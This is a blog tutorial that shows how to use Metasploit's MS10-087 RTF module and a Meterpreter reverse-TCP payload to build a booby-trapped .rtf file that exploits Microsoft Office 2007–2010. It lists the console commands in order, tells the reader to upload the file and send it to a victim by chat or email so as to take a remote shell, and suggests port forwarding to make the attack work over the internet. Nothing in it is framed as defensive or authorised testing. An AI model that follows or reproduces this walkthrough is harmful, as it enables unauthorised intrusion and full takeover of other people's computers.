Wednesday, December 26, 2018

Exploit Microsoft Office 2007 - 2010 vulnerability using Metasploit

This attack exploits the vulnerability inside Microsoft Office 2007 to 2010. Basically, I am going to show you how to create a rich text format (.rtf) file that has an exploit embedded inside the file. Once the victim opens the file in the Microsoft word program, it will load the file and crash the program. Once the office on the victim's computer crashed you will gain a shell and have full control of the victim's computer.

1. Turn on your Kali Linux machine

2. Open the terminal and type in msfconsole and press Enter. Wait for Metasploit to load (it could take a while)

3. Once Metasploit has been loaded completely. Type in the command below;

use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

4. Now we need to set up the meterpreter by typing in the following command

set payload windows/meterpreter/reverse_tcp

5. This step is optional but recommended because it shows you the options you can use for this exploit. It will also show you the file name you generated, LHOST, LPORT etc. You can view the option by typing in show options and press Enter

6. Now you can generate the .rtf file by typing in the command set FILENAME filename.rtf and press Enter, where filename.rtf is the name of the file.

7. Now we need to set up the Local Host. This will be the system that you will be listening on when the victim executes the payload on their computer. To set the LHOST you must first get your computer IP Address. To do this open a new terminal and type in ifconfig and press Enter. You should now see a screen like below. Now copy the IP Address. 

8. Go back to the Metasploit console and paste the IP Address into the Metasploit console like below. 

set LHOST and press Enter

9. Before we exploit the victim's system, let's check to make sure all of our options are set properly. Type in show options and press Enter

10. Now you are ready to exploit. Simply type in exploit and press Enter

11. The file is now generated and it is located in the /root/.msf4/local/filename.rtf directory (in my case it is /root/.msf4/local/filename.rtf/greeting.rtf). I recommend navigating to the directory and copy the exploit to the Desktop like I have below.

Just type in cd /root/.msf4/local and press Enter to move to the directory containing the exploit, then execute the following command;

cp /root/.msf4/local/filename.rtf /root/Desktop

In my case, it is cp /root/.msf4/local/greeting.rtf /root/Desktop

You should now see a copy of the exploit on your Kali Desktop. Upload this file to a file hosting service, generate a link and send it to the victim via chat or email. Once the victim downloaded the file and open it. BOOM you own their computer. From here you can navigate their computer using the Metasploit console. Just type in shell and press Enter to drop into a shell.

Note that what I just showed you only works on LAN and not WAN or the Internet. In order for this to work over the internet, you will need to go into your router and configure port forwarding. To learn more about port forwarding click here


Post a Comment